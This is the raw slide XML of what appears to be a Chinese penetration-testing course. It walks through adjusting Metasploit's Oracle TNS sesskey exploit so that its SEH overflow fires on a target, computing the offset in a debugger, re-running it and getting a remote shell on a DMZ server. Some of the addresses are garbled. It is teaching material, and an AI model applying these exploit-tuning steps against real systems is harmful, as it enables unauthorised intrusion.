          <a:bodyPr vert="horz" wrap="square" lIns="123825" tIns="123825" rIns="57150" bIns="123825" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>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注意文件位置，位于/usr/share文件夹下，这个主要是共享文件夹，如图5-1所示。</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1160389" y="6330317"/>
            <a:ext cx="668149" cy="117156"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="100000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="AutoShape 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1109991" y="6330317"/>
            <a:ext cx="117156" cy="117156"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="100000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="AutoShape 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1760312" y="6330317"/>
            <a:ext cx="117156" cy="117156"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="100000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Connector 16"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828538" y="640102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47752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使用metaspliot</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6" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2465705" y="2552700"/>
            <a:ext cx="6506845" cy="2553970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4114800" y="5334000"/>
            <a:ext cx="2908300" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-1 /usr/share共享文件夹</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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14400" y="1676400"/>
            <a:ext cx="10458450" cy="3838575"/>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在函数exploit 中，包含了渗透攻击的所有动作，包括与远端服务器的Oracle 服务建立连接，构造畸形数据包溢出栈缓冲区，回连 Shell 等操作。</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分析问题及原因</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你从Metasploit框架中找到了利用这一安全漏洞的渗透攻击模块。该模块源代码的完整文件路径为[Metasploit 安装路径]/modules/exploits/windows/oracle/tns auth sesskeyrb。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>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你终于通过调试分析，找到了失败的确切原因，并非是因为 target 中的返回地址不匹配，而是因为在目标环境下所需要的覆盖字符串长度比原先测试环境中要更长，才能成功覆盖到关键的 SEH 结构体。</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14400" y="1676400"/>
            <a:ext cx="10458450" cy="3838575"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>接下来你的任务就是要计算出合适的字符串长度。先在 CPU窗口的内存部分，找到源地址0x04AB99A4处的待复制字符串，接着搜索字符串中的返回地址，点右键选择“Search for”选项下的“Binary string”，注意将返回地址0x011b0528换成小端序28x05xlBlx01。在地址0x04AB9B2 处搜到了返回地址。下面计算返回地址和源地址间的偏移量，0x04AB9B42-0x04AB99A4=0x19E，而目的地址到 SEH Handler 的偏移量是0x0673DC44-0x0673DA96=x1AE，因此，需要在返回地址之前增加 0x10字节。</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60525"/>
            <a:ext cx="9983470"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位置：/usr/share/metasploit-framework/modules/exploits/windows/oracle，如图5-71所示。</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80" name="图片 71" descr="3"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2362200" y="2667000"/>
            <a:ext cx="8179435" cy="1827530"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4114800" y="4648200"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-71 打开攻击机虚拟机配置文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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10458450"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打开攻击机虚拟机配置参数bulid exploit buffe，如图5-72所示。</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191000" y="6248400"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-72 打开攻击机虚拟机配置参数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="77" name="图片 72" descr="image (17)"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276600" y="2286000"/>
            <a:ext cx="5621655" cy="3745865"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>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10458450"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打开攻击机虚拟机配置参数，如图5-73所示。</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657600" y="5334000"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-73 打开攻击机虚拟机配置参数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="70" name="图片 73" descr="image (18)"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2731135" y="2362200"/>
            <a:ext cx="6652260" cy="2672080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>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10458450"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修改后的代码，如图5-74所示。</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4267200" y="4114800"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-74 修改后的代码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="71" name="图片 74" descr="image (19)"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048000" y="2286000"/>
            <a:ext cx="4999355" cy="1649095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>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10458450"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再次执行渗透攻击，如图5-75所示。</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886200" y="5410200"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-75 再次执行渗透攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="76" name="图片 75" descr="image (20)"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2971800" y="2286000"/>
            <a:ext cx="4631690" cy="2988945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>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10458450"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进行rexploit，如图5-76所示。</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886200" y="5410200"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-76 进行rexploit</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="74" name="图片 76" descr="image (21)"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2956560" y="2209800"/>
            <a:ext cx="5311140" cy="2965450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>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缓冲区溢出任务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1705" y="1676400"/>
            <a:ext cx="10458450" cy="840740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:no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进行sysinfo，如图5-77所示。</a:t>
            </a:r>
            <a:endParaRPr sz="20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1371600" y="1261745"/>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2.缓冲区溢出任务实施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962400" y="4419600"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-77 进行sysinfo</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="78" name="图片 77" descr="image (22)"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2667000" y="2286000"/>
            <a:ext cx="5387340" cy="1991360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="4953000"/>
            <a:ext cx="10159365" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>渗透测试成功，你得到测试系统返回的 Shell。接下来的事情就水到渠成了，你将修改后的渗透攻击应用到 DMZ 区的后台服务器目标系统，便成功进人目标主机，获得了远程访问权。</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ags/tag3.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ISLIDE.DIAGRAM" val="#472308"/>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14734</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>951</Paragraphs>
  <Slides>101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101</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="112" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>黑体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>华文新魏</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>华文宋体</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cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-08-16T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-11T07:56:45Z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DB650667B37C49428FEF3828B8C41F25</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-11.8.2.12265</vt:lpwstr>
  </property>
</Properties>
</file>